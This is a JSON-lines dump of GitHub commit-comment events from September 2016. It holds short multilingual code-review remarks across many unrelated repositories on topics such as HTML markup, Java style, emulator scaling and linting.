{"id":"4579929935","type":"CommitCommentEvent","actor":{"login":"mecctro"},"repo":{"name":"mecctro/rehash"},"payload":{"comment":{"id":19070655,"position":4,"line":44,"path":"themes/default/THEME","commit_id":"b81aa933fcfab30732634951b3dc3127acd4c231","created_at":"2016-09-18T13:32:34Z","updated_at":"2016-09-18T13:32:34Z","body":"Is this supposed to be here? can't seem to find it..."}},"created_at":"2016-09-18T13:32:34Z"}
{"id":"4579930677","type":"CommitCommentEvent","actor":{"login":"nerdmed"},"repo":{"name":"ephemer/cordova-plugin-wkwebview-engine"},"payload":{"comment":{"id":19070659,"position":null,"line":null,"path":null,"commit_id":"b87ad79a12af05c9a14559dd3f1d8e658493c27c","created_at":"2016-09-18T13:33:05Z","updated_at":"2016-09-18T13:33:05Z","body":"@ephemer does this https://github.com/apache/cordova-plugin-wkwebview-engine/commit/42c847b2680a80e52ffd3617119ddd6634751453\r\n\r\nfix our issue? I would like to move back to upstream?"}},"created_at":"2016-09-18T13:33:05Z"}
{"id":"4579931306","type":"CommitCommentEvent","actor":{"login":"dictoon"},"repo":{"name":"appleseedhq/appleseed"},"payload":{"comment":{"id":19070660,"position":45,"line":174,"path":"src/appleseed/renderer/kernel/rendering/generic/generictilerenderer.cpp","commit_id":"b29c75acc89e2b9c8f04a9adbf261941cfcdd56d","created_at":"2016-09-18T13:33:33Z","updated_at":"2016-09-18T13:33:33Z","body":"Woops, good point! Will fix now. Thanks!"}},"created_at":"2016-09-18T13:33:33Z"}
{"id":"4579932536","type":"CommitCommentEvent","actor":{"login":"HarimaKenji1"},"repo":{"name":"HarimaKenji1/HelloWorld"},"payload":{"comment":{"id":19070663,"position":null,"line":null,"path":null,"commit_id":"617089a417ddf8f21a2f94bff6a6b9472322114c","created_at":"2016-09-18T13:34:22Z","updated_at":"2016-09-18T13:34:22Z","body":"Finish Homework 2"}},"created_at":"2016-09-18T13:34:22Z"}
{"id":"4579933788","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"okitec/teutoburg"},"payload":{"comment":{"id":19070664,"position":null,"line":null,"path":null,"commit_id":"79861cc1653a37004c3a472ad23da97f5daa3803","created_at":"2016-09-18T13:35:19Z","updated_at":"2016-09-18T13:35:19Z","body":"@drt2016 I integrated your changes. Thanks!"}},"created_at":"2016-09-18T13:35:19Z"}
{"id":"4579936242","type":"CommitCommentEvent","actor":{"login":"jenslody"},"repo":{"name":"GNOME/gnome-dvb-daemon"},"payload":{"comment":{"id":19070672,"position":null,"line":null,"path":null,"commit_id":"dfe9eb38b856d11099c8519d81e5d7df8886040e","created_at":"2016-09-18T13:37:02Z","updated_at":"2016-09-18T13:37:02Z","body":"Patch to make the --enable-grilo-plugin parameter work."}},"created_at":"2016-09-18T13:37:02Z"}
{"id":"4579936819","type":"CommitCommentEvent","actor":{"login":"mingliao"},"repo":{"name":"mingliao/projects_mobile_miaowei_cctv"},"payload":{"comment":{"id":19070674,"position":19,"line":97,"path":"js/index.js","commit_id":"c70bf6fabfb9587ec434fd0465efc6ca003af7fd","created_at":"2016-09-18T13:37:27Z","updated_at":"2016-09-18T13:37:27Z","body":"记录偏移量。"}},"created_at":"2016-09-18T13:37:27Z"}
{"id":"4579940805","type":"CommitCommentEvent","actor":{"login":"vakie"},"repo":{"name":"vakie/homework1"},"payload":{"comment":{"id":19070685,"position":null,"line":null,"path":null,"commit_id":"94d732b2acd80b4632e1a9236a5e21832b5700cd","created_at":"2016-09-18T13:40:18Z","updated_at":"2016-09-18T13:40:18Z","body":"![default](https://cloud.githubusercontent.com/assets/22130002/18616100/75e3c2e0-7de8-11e6-8586-00150cc99407.PNG)\r\n![1](https://cloud.githubusercontent.com/assets/22130002/18616101/7961e190-7de8-11e6-9ccd-57b67818bc98.PNG)\r\n"}},"created_at":"2016-09-18T13:40:18Z"}
{"id":"4579941499","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19070687,"position":698,"line":698,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T13:40:49Z","updated_at":"2016-09-18T13:40:49Z","body":"测试环境代码没有这个方法，同时出现了 `Cannot read property 'pos' of null` 的错误，有考虑过后端没有返回仓库信息的情况吗？"}},"created_at":"2016-09-18T13:40:49Z"}
{"id":"4579942872","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19070689,"position":15,"line":33,"path":"src/pocketmine/block/ActiveRedstoneLamp.php","commit_id":"fdf7e57405e864fe4896cf76b8c51946ed626400","created_at":"2016-09-18T13:41:51Z","updated_at":"2016-09-18T13:41:51Z","body":"OK, will change"}},"created_at":"2016-09-18T13:41:51Z"}
{"id":"4579943269","type":"CommitCommentEvent","actor":{"login":"jhnet3"},"repo":{"name":"jhnet3/gulp-jspm-build"},"payload":{"comment":{"id":19070691,"position":null,"line":null,"path":null,"commit_id":"672f9afbf126c8e5f887c186a18dc96430ac182a","created_at":"2016-09-18T13:42:06Z","updated_at":"2016-09-18T13:42:06Z","body":"Fixed sourceMappingUrl should be sourceMappingURL, and amended associated test.  Also changed istanbul jasmine to workaround error on Windows per https://github.com/gotwarlost/istanbul/issues/64.\r\nThank you."}},"created_at":"2016-09-18T13:42:06Z"}
{"id":"4579943406","type":"CommitCommentEvent","actor":{"login":"off99555"},"repo":{"name":"off99555/Thai-thesis-classification"},"payload":{"comment":{"id":19070692,"position":null,"line":null,"path":null,"commit_id":"f477768f6e19bc74b4aa2307e85bc5c77bff7ba5","created_at":"2016-09-18T13:42:11Z","updated_at":"2016-09-18T13:42:11Z","body":"I have seen a lot of jokes about copying code from stackoverflow but haven't done it even once. Now this is my first time doing exactly the joke!"}},"created_at":"2016-09-18T13:42:11Z"}
{"id":"4579946900","type":"CommitCommentEvent","actor":{"login":"vertigo17"},"repo":{"name":"vertigo17/Cerberus"},"payload":{"comment":{"id":19070696,"position":null,"line":null,"path":null,"commit_id":"a37a5d989be9bbd444e1e8732fc07db550d7d8f3","created_at":"2016-09-18T13:44:40Z","updated_at":"2016-09-18T13:44:40Z","body":"We will have to move label management in object mode."}},"created_at":"2016-09-18T13:44:40Z"}
{"id":"4579949967","type":"CommitCommentEvent","actor":{"login":"nikolai-b"},"repo":{"name":"npct/pct-shiny"},"payload":{"comment":{"id":19070697,"position":null,"line":null,"path":null,"commit_id":"b249564090bf01b583dff05ca731a8545d6fcec3","created_at":"2016-09-18T13:46:34Z","updated_at":"2016-09-18T13:46:34Z","body":"Ah, I see.\r\nSo we can delete everything after https://github.com/npct/pct-shiny/commit/b249564090bf01b583dff05ca731a8545d6fcec3#diff-cf12ea6fd80476e143be3991f5dd2304R51 as this now just creates the GeoJSON for the front map, instead of creating the map itself.  Is that ok?"}},"created_at":"2016-09-18T13:46:34Z"}
{"id":"4579950053","type":"CommitCommentEvent","actor":{"login":"Snuupy"},"repo":{"name":"Emil-A/XE-overlay"},"payload":{"comment":{"id":19070698,"position":null,"line":null,"path":null,"commit_id":"47b78b73bc39f67bc3f99c2dc02a87a0a5158984","created_at":"2016-09-18T13:46:38Z","updated_at":"2016-09-18T13:46:38Z","body":"I didn't leave this horrible commit message i swear"}},"created_at":"2016-09-18T13:46:38Z"}
{"id":"4579950578","type":"CommitCommentEvent","actor":{"login":"112212"},"repo":{"name":"112212/simple-gui-engine"},"payload":{"comment":{"id":19070700,"position":18,"line":658,"path":"UI/Gui.cpp","commit_id":"6d8c15608ab467cdc3e05c83d83e82ff2476ee0f","created_at":"2016-09-18T13:46:59Z","updated_at":"2016-09-18T13:46:59Z","body":"my bad"}},"created_at":"2016-09-18T13:46:59Z"}
{"id":"4579952928","type":"CommitCommentEvent","actor":{"login":"txd222"},"repo":{"name":"txd222/compuational_physics_2014301020086"},"payload":{"comment":{"id":19070703,"position":null,"line":null,"path":null,"commit_id":"f461ed7e3b99d58b2b459e117bb2f9c3116c6410","created_at":"2016-09-18T13:48:40Z","updated_at":"2016-09-18T13:48:40Z","body":"\r\n![default](https://cloud.githubusercontent.com/assets/22029290/18616197/a1da18bc-7de9-11e6-84ad-15bdceb234e3.PNG)\r\n![default](https://cloud.githubusercontent.com/assets/22029290/18616193/9c8b2a72-7de9-11e6-8eac-867f6c16f27d.PNG)\r\n\r\n\r\n![Uploading 实验结果.PNG…]()\r\n![Uploading 保存.PNG…]()\r\n"}},"created_at":"2016-09-18T13:48:40Z"}
{"id":"4579955006","type":"CommitCommentEvent","actor":{"login":"antonioginer"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19070705,"position":null,"line":null,"path":null,"commit_id":"161a08dd4acd792c71d665d3abc16c3093053de8","created_at":"2016-09-18T13:50:11Z","updated_at":"2016-09-18T13:50:11Z","body":"Hi Jeeze,\r\n\r\n> For example the fractional scale on the x-axis stops if the target_aspect becomes greater than the src_aspect.\r\n\r\nI'm quite sure this is not the case. E.g. on a 16:9 monitor (16:9 > 4:3) I'm running:\r\n\r\nmame64 tengai -window -unevenstretchx -nofilter\r\n\r\nIf you press print screen and paste the result in mspaint, you clearly see the some of the pixels are wider than others, because fractional scaling is indeed being applied.\r\n\r\nIf we didn't allow keepaspect for the fractional scaled axis, we couldn't run vertical games on a horizontally mounted CRT, the way I mentioned some posts above.\r\n\r\n> e.g. tengai -window -nounevenstretch -intoverscan\r\n> \r\n> As you can see the scanlines are not even anymore, which indicates that the\r\n> scaling might not be integer. \r\n\r\nI've tried the same print screen trick (without hlsl enabled) and definitely integer scaling is still being applied regardless of overscan. However, when I enable hlsl, I can clearly see the issue you're saying. I'd say it has to do with the way the shader is being mapped to the buffer, although that's far beyond my understanding.\r\n\r\n\r\n"}},"created_at":"2016-09-18T13:50:11Z"}
{"id":"4579957236","type":"CommitCommentEvent","actor":{"login":"yinghhou"},"repo":{"name":"yinghhou/dist"},"payload":{"comment":{"id":19070710,"position":null,"line":null,"path":null,"commit_id":"9e834d693dc2bae71d2f6f186f17c79be38f8551","created_at":"2016-09-18T13:51:52Z","updated_at":"2016-09-18T13:51:52Z","body":"jfhkdh"}},"created_at":"2016-09-18T13:51:52Z"}
{"id":"4579957649","type":"CommitCommentEvent","actor":{"login":"yinghhou"},"repo":{"name":"yinghhou/dist"},"payload":{"comment":{"id":19070711,"position":null,"line":null,"path":null,"commit_id":"9e834d693dc2bae71d2f6f186f17c79be38f8551","created_at":"2016-09-18T13:52:11Z","updated_at":"2016-09-18T13:52:11Z","body":"zheshi大结局的基督教的"}},"created_at":"2016-09-18T13:52:11Z"}
{"id":"4579959541","type":"CommitCommentEvent","actor":{"login":"bluegr"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19070714,"position":null,"line":null,"path":null,"commit_id":"a6d71c941d9ee2c63f7af6f447862c172544f843","created_at":"2016-09-18T13:53:31Z","updated_at":"2016-09-18T13:53:31Z","body":"For uniformity with other engines, would it be possible to put all this code in saveload.*?"}},"created_at":"2016-09-18T13:53:31Z"}
{"id":"4579961034","type":"CommitCommentEvent","actor":{"login":"RobertYulius"},"repo":{"name":"RobertYulius/compuational_physics_N2014301020088"},"payload":{"comment":{"id":19070715,"position":null,"line":null,"path":null,"commit_id":"553a235b52d51a56dcaa076f0fe9b26567e52de4","created_at":"2016-09-18T13:54:35Z","updated_at":"2016-09-18T13:54:35Z","body":"![qq 20160918212823](https://cloud.githubusercontent.com/assets/22029617/18616214/f1a91550-7de9-11e6-9f69-24797a3f031e.png)\r\n"}},"created_at":"2016-09-18T13:54:35Z"}
{"id":"4579961638","type":"CommitCommentEvent","actor":{"login":"4iar"},"repo":{"name":"FreeCodeCamp/nonprofit-email-service"},"payload":{"comment":{"id":19070716,"position":null,"line":null,"path":null,"commit_id":"8f273661c6c90ce77725db8f944b0a9f20123982","created_at":"2016-09-18T13:54:56Z","updated_at":"2016-09-18T13:54:56Z","body":"aslkdjflkjasldkjf"}},"created_at":"2016-09-18T13:54:56Z"}
{"id":"4579962349","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19070719,"position":8,"line":8,"path":"experiments/amulet/design/00-overview.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-18T13:55:27Z","updated_at":"2016-09-18T13:55:27Z","body":"Just pasting in some comments I made on Gitter:\r\n\r\n> When I started Amulet I was originally going to handle side effects through a \"tagging system\": \r\n - Methods which errored `throw`\r\n - Async methods would be marked `async`\r\n - Methods which mutated the state of something `mutates`\r\n - Methods which relied on mutable state `impure`.\r\n>\r\n> Having thought about this a bit more it feels better to handle errors as `Maybe` or `Either`. Maybe with some fancy methods for additional context. `Async` ends up being another name for `IO`. In short this can be bundled as monads.\r\n>\r\n> The second two, I'm not sure how to handle them. I personally feel mutability is nice in small doses: as I've said before: especially when not exposed in the API: some algorithms are much easier when written in a mutable style. The key here is not leaking internal mutability out to the public.\r\n\r\nI think one of the three bullets in my previous comment means annotations can be removed."}},"created_at":"2016-09-18T13:55:27Z"}
{"id":"4579965990","type":"CommitCommentEvent","actor":{"login":"TooTallNate"},"repo":{"name":"TooTallNate/hyperlinks"},"payload":{"comment":{"id":19070726,"position":null,"line":null,"path":null,"commit_id":"709c501cfe90fee6b328d35bcffd3ecf18049dc9","created_at":"2016-09-18T13:58:02Z","updated_at":"2016-09-18T13:58:02Z","body":"@giuseppeg I'm working on dirs as well"}},"created_at":"2016-09-18T13:58:02Z"}
{"id":"4579968359","type":"CommitCommentEvent","actor":{"login":"NickolasBiletskiy"},"repo":{"name":"NickolasBiletskiy/Scheduler"},"payload":{"comment":{"id":19070728,"position":null,"line":null,"path":null,"commit_id":"81637c61017cbc8ba2372815c32e166911f81da0","created_at":"2016-09-18T13:59:40Z","updated_at":"2016-09-18T13:59:40Z","body":"This commit was made by:\r\n1) git branch newBranch\r\n2) git checkout newBranch\r\n2) git commit\r\n3)git rebase master"}},"created_at":"2016-09-18T13:59:40Z"}
{"id":"4579974621","type":"CommitCommentEvent","actor":{"login":"KalleLeskinen"},"repo":{"name":"KalleLeskinen/SAIEP"},"payload":{"comment":{"id":19070746,"position":null,"line":null,"path":null,"commit_id":"69053158bf234108477b3ac7d1950f3cb69daa95","created_at":"2016-09-18T14:03:10Z","updated_at":"2016-09-18T14:03:10Z","body":"Kachow!"}},"created_at":"2016-09-18T14:03:10Z"}
{"id":"4579974853","type":"CommitCommentEvent","actor":{"login":"lemonzi"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19070748,"position":null,"line":null,"path":null,"commit_id":"fc0fbbd8b2e0effbd90c6767557179069f23a0a8","created_at":"2016-09-18T14:03:21Z","updated_at":"2016-09-18T14:03:21Z","body":"I really like the [2**i for i in range(9)] * 2, but it's not possible in JSON...."}},"created_at":"2016-09-18T14:03:21Z"}
{"id":"4579975933","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19070751,"position":20,"line":30,"path":"src/main/java/com/minecolonies/MineColonies.java","commit_id":"c5884868469d98ad646b44baa3773d9d8df6e566","created_at":"2016-09-18T14:04:10Z","updated_at":"2016-09-18T14:04:10Z","body":"TODO: Replace this with something more adequate once we know why our old log methods fail\r\n@cltnschlosser @Raycoms "}},"created_at":"2016-09-18T14:04:10Z"}
{"id":"4579976067","type":"CommitCommentEvent","actor":{"login":"junjun1092"},"repo":{"name":"junjun1092/beego-blog"},"payload":{"comment":{"id":19070752,"position":null,"line":null,"path":null,"commit_id":"bbf4c92bac6de6122afeba1132ae34ca5b728bea","created_at":"2016-09-18T14:04:14Z","updated_at":"2016-09-18T14:04:14Z","body":"之前表述不确切；:=在使用的时候，如果是int这种类型，可以直接这样写a1:= 2，直接将确切的值赋给变量，如果是一个类型别名的话比如：type  TZ int，这样就用:=去赋值，可以使用var a TZ这种形式来赋值；"}},"created_at":"2016-09-18T14:04:14Z"}
{"id":"4579976496","type":"CommitCommentEvent","actor":{"login":"notesecret"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":19070754,"position":null,"line":null,"path":null,"commit_id":"ba7291314ebe846466fc286f7b80c7d48fe07a30","created_at":"2016-09-18T14:04:30Z","updated_at":"2016-09-18T14:04:30Z","body":"โหลดตัว master มาลองใช้เจอเด้งพวก packet 0004 , 0600 , 0700 , DD61 ครับ\r\n\r\nแต่ผมใช้ตัวเก่า V9 แล้วปรับแค่เพิ่ม hmac มายังไม่เด้งอะไรเลยครับตั้งแต่ 4 วันที่แล้ว"}},"created_at":"2016-09-18T14:04:30Z"}
{"id":"4579977075","type":"CommitCommentEvent","actor":{"login":"theAwesomeMarcel"},"repo":{"name":"theAwesomeMarcel/der-arme-heinrich"},"payload":{"comment":{"id":19070756,"position":null,"line":null,"path":null,"commit_id":"8d34a25fc59a2d2a6ba8262a629114cff9fa4252","created_at":"2016-09-18T14:04:55Z","updated_at":"2016-09-18T14:04:55Z","body":"g"}},"created_at":"2016-09-18T14:04:55Z"}
{"id":"4579981252","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19070775,"position":9,"line":9,"path":"experiments/amulet/design/ReadMe.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-18T14:07:45Z","updated_at":"2016-09-18T14:07:45Z","body":"Give me a place to write these down (and preferably a format to follow) and I can have the basic libraries done by tomorrow (:P)"}},"created_at":"2016-09-18T14:07:45Z"}
{"id":"4579982692","type":"CommitCommentEvent","actor":{"login":"ikozhukhov"},"repo":{"name":"joyent/illumos-joyent"},"payload":{"comment":{"id":19070778,"position":null,"line":null,"path":null,"commit_id":"6a41e7224f5dce21547e07eced881016dac9e18a","created_at":"2016-09-18T14:08:37Z","updated_at":"2016-09-18T14:08:37Z","body":"for \"#if defined(__amd64) || defined(__i386)\" we can use one macro: #if defined(__x86)"}},"created_at":"2016-09-18T14:08:37Z"}
{"id":"4579986597","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070790,"position":23,"line":13,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:10:50Z","updated_at":"2016-09-18T14:10:50Z","body":"Лишняя обертка, достаточно только container"}},"created_at":"2016-09-18T14:10:50Z"}
{"id":"4579987485","type":"CommitCommentEvent","actor":{"login":"River-Go"},"repo":{"name":"PX4/Hardware"},"payload":{"comment":{"id":19070791,"position":null,"line":null,"path":null,"commit_id":"dde7158a2a3e0b4c9f8ba788422030559152c998","created_at":"2016-09-18T14:11:24Z","updated_at":"2016-09-18T14:11:24Z","body":"just a test!"}},"created_at":"2016-09-18T14:11:24Z"}
{"id":"4579989051","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070793,"position":30,"line":20,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:12:25Z","updated_at":"2016-09-18T14:12:25Z","body":"Здесь обертка совсем не обязательна, достаточно только ссылки с вложенным span"}},"created_at":"2016-09-18T14:12:25Z"}
{"id":"4579989201","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070794,"position":32,"line":22,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:12:30Z","updated_at":"2016-09-18T14:12:30Z","body":"Здесь обертка совсем не обязательна, достаточно только ссылки с вложенным span"}},"created_at":"2016-09-18T14:12:30Z"}
{"id":"4579992336","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070799,"position":34,"line":24,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:14:31Z","updated_at":"2016-09-18T14:14:31Z","body":"Здесь тоже обертка лишняя, и если вы планируете делать эти блоки через float, то порядок этих блоков в разметке нужно поменять"}},"created_at":"2016-09-18T14:14:31Z"}
{"id":"4579992346","type":"CommitCommentEvent","actor":{"login":"f-knorr"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19070800,"position":9,"line":24092,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/rules/de/grammar.xml","commit_id":"903d6e0c4fc7a2cac578a69801db6cd592863cc1","created_at":"2016-09-18T14:14:31Z","updated_at":"2016-09-18T14:14:31Z","body":"done"}},"created_at":"2016-09-18T14:14:31Z"}
{"id":"4579993379","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19070804,"position":null,"line":null,"path":null,"commit_id":"c87e739fd7754032dd10c7175b8ae51a03ffc9f2","created_at":"2016-09-18T14:15:12Z","updated_at":"2016-09-18T14:15:12Z","body":"Might just as well implement #145 in here.\r\nAlso, I would like to point out line 114:\r\n```:param int delay: The delay in seconds.```\r\nshould really be\r\n```:param float delay: The delay in seconds.```\r\nBecause PyCharm keeps highlighting stuff when I pass float value to the constructor.\r\nAlso, recently I received a question in steam, guy was asking how to pass a float value to `Delay`. That guy was using PyCharm too."}},"created_at":"2016-09-18T14:15:12Z"}
{"id":"4579995973","type":"CommitCommentEvent","actor":{"login":"marciomazza"},"repo":{"name":"veggiemonk/ansible-dotfiles"},"payload":{"comment":{"id":19070811,"position":3,"line":3,"path":"tasks/vim-plugins.yml","commit_id":"e268b5043a3a2218e211fd93f5e78e8eadf5b222","created_at":"2016-09-18T14:16:59Z","updated_at":"2016-09-18T14:16:59Z","body":"Maybe this will suffice:\r\n```\r\nshell: vim -c \":PlugInstall\" -c qa\r\n```"}},"created_at":"2016-09-18T14:16:59Z"}
{"id":"4579997262","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070819,"position":48,"line":44,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:17:54Z","updated_at":"2016-09-18T14:17:54Z","body":"Почему эти элементы сделаны списком? Здесь просто пара ссылок, а остальное лишняя обертка без которой можно вполне обойтись"}},"created_at":"2016-09-18T14:17:54Z"}
{"id":"4579998486","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070823,"position":38,"line":38,"path":"js/services/restRequest.js","commit_id":"c297ec279fd6ca96e060316ce1e248c5158eb6e1","created_at":"2016-09-18T14:18:45Z","updated_at":"2016-09-18T14:18:45Z","body":"Здесь лучше реджектить deferred"}},"created_at":"2016-09-18T14:18:45Z"}
{"id":"4579998984","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19070825,"position":null,"line":null,"path":null,"commit_id":"e596dae327b445718022689926174307616b3d91","created_at":"2016-09-18T14:19:07Z","updated_at":"2016-09-18T14:19:07Z","body":"How about a simpler direction? Produce the result for classes at the file at the top level, rather than for file. For each class you would have to print the file name. In most cases, one class = one file, but this way you would not have to deal with the imports at all."}},"created_at":"2016-09-18T14:19:07Z"}
{"id":"4580001535","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070836,"position":48,"line":44,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:20:51Z","updated_at":"2016-09-18T14:20:51Z","body":"Потеряли в этом блоке кнопки \"Войти\" и \"Регистрация\" -  они тоже должны быть, так как пользователь мог и не войти в \"личный кабинет\". "}},"created_at":"2016-09-18T14:20:51Z"}
{"id":"4580002185","type":"CommitCommentEvent","actor":{"login":"mjackson"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19070837,"position":null,"line":null,"path":null,"commit_id":"a533fbc08be365dd70880b42fa62cc2e6d20b232","created_at":"2016-09-18T14:21:17Z","updated_at":"2016-09-18T14:21:17Z","body":"Noooooooo. We used that for a while but it's way too strict. I only want\nthe linter telling me when stuff is broken.\nOn Sat, Sep 17, 2016 at 8:57 PM Daniel Steigerwald <notifications@github.com>\nwrote:\n\n> Please consider https://github.com/airbnb/javascript. It is the standard:\n> > 40 000 stars. Nevertheless, it's nicely strictly. And it also checks... a\n> lot of JSX stuff.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ReactTraining/react-router/commit/a533fbc08be365dd70880b42fa62cc2e6d20b232#commitcomment-19068885>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFqp81bbzrqeodkBLbdKvmktM4k1qwnks5qrLawgaJpZM4J_ytH>\n> .\n>\n-- \nMichael Jackson\n@mjackson\n"}},"created_at":"2016-09-18T14:21:17Z"}
{"id":"4580003010","type":"CommitCommentEvent","actor":{"login":"monejava"},"repo":{"name":"apache/fop"},"payload":{"comment":{"id":19070840,"position":15,"line":245,"path":"fop-core/src/main/java/org/apache/fop/complexscripts/scripts/IndicScriptProcessor.java","commit_id":"7e8b8f45f4f5e489ba9ddd0864f547cef70e6920","created_at":"2016-09-18T14:21:54Z","updated_at":"2016-09-18T14:21:54Z","body":"Here you could have done:\r\n\r\n`basicShapingFeatures = new HashSet<String>(BASIC_SHAPING_FEATURE_STRINGS);`\r\n\r\nAvoiding to import the Collections class.\r\n\r\nThe same applies to the other similar statements."}},"created_at":"2016-09-18T14:21:54Z"}
{"id":"4580003585","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19070842,"position":null,"line":null,"path":null,"commit_id":"2bbe6446b948f2f83914d5431889f3df33947667","created_at":"2016-09-18T14:22:18Z","updated_at":"2016-09-18T14:22:18Z","body":"Initial commit"}},"created_at":"2016-09-18T14:22:18Z"}
{"id":"4580004224","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070845,"position":83,"line":84,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:22:45Z","updated_at":"2016-09-18T14:22:45Z","body":"Перенесите на новые строки вложенные элементы, так читаемость улучшается"}},"created_at":"2016-09-18T14:22:45Z"}
{"id":"4580004726","type":"CommitCommentEvent","actor":{"login":"NoSpamDan"},"repo":{"name":"slim-opt/device_oneplus_onyx"},"payload":{"comment":{"id":19070847,"position":null,"line":null,"path":null,"commit_id":"38b5ee2d1b88f20eafe2399933e3fb2388781e8c","created_at":"2016-09-18T14:23:05Z","updated_at":"2016-09-18T14:23:05Z","body":"This fixes it:\r\nhttps://github.com/NoSpamDan/android_external_ant-wireless_ant_service/commit/931170003a76aba91ddfd25107aeff01bfc599cc\r\n"}},"created_at":"2016-09-18T14:23:05Z"}
{"id":"4580006291","type":"CommitCommentEvent","actor":{"login":"ephemer"},"repo":{"name":"ephemer/cordova-plugin-wkwebview-engine"},"payload":{"comment":{"id":19070854,"position":null,"line":null,"path":null,"commit_id":"b87ad79a12af05c9a14559dd3f1d8e658493c27c","created_at":"2016-09-18T14:24:11Z","updated_at":"2016-09-18T14:24:11Z","body":"I think so yes"}},"created_at":"2016-09-18T14:24:11Z"}
{"id":"4580006474","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070857,"position":97,"line":91,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:24:18Z","updated_at":"2016-09-18T14:24:18Z","body":"Все-таки здесь нужна обертка чтобы добавить clearfix, если бы не было элемента h2, тогда да, обертка не нужна бы была, вы бы добавили clearfix к container, а здесь так не получится."}},"created_at":"2016-09-18T14:24:18Z"}
{"id":"4580007163","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"AlG-off/epam_final-task"},"payload":{"comment":{"id":19070860,"position":17,"line":17,"path":"pages/login.html","commit_id":"4bb189d21711a18950c4c2a91c47fdb04b5bd944","created_at":"2016-09-18T14:24:46Z","updated_at":"2016-09-18T14:24:46Z","body":"signin лучше было бы сделать на сабмит формы"}},"created_at":"2016-09-18T14:24:46Z"}
{"id":"4580009367","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070866,"position":121,"line":115,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:26:08Z","updated_at":"2016-09-18T14:26:08Z","body":"не исправили name, "}},"created_at":"2016-09-18T14:26:08Z"}
{"id":"4580010093","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19070868,"position":131,"line":125,"path":"catalog.html","commit_id":"eea82044d9cd8642d3741c16336189d25f49a911","created_at":"2016-09-18T14:26:39Z","updated_at":"2016-09-18T14:26:39Z","body":"Перенесите на новые строки вложенные элементы"}},"created_at":"2016-09-18T14:26:39Z"}
